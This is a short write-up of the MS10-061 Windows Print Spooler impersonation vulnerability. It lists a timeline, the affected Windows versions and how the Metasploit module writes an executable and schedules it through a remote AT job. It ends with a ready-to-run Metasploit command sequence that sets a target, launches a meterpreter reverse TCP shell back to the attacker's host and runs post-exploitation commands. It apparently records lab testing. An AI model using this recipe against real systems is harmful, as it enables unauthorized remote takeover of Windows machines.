MS10-061 : Microsoft Print Spooler Service Impersonation Vulnerability

Timeline :

Vulnerability exploited by the StuxNet worm
Security update released by Microsoft (KB2347290) the 2010-09-14
Metasploit PoC released the 2010-09-17

    PoC provided by :

jduck
hdm

    Reference(s) :

CVE-2010-2729
MS10-061

    Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

    Tested on Windows XP SP3

    Description :

This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes an EXE and then (ab)uses the impersonation vulnerability a second time to create a secondary RPC connection to the \PIPE\ATSVC named pipe. We then proceed to create a remote AT job using a blind NetrJobAdd RPC call.

    Commands :

use exploit/windows/smb/ms10_061_spoolss
nmap 192.168.178.41
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig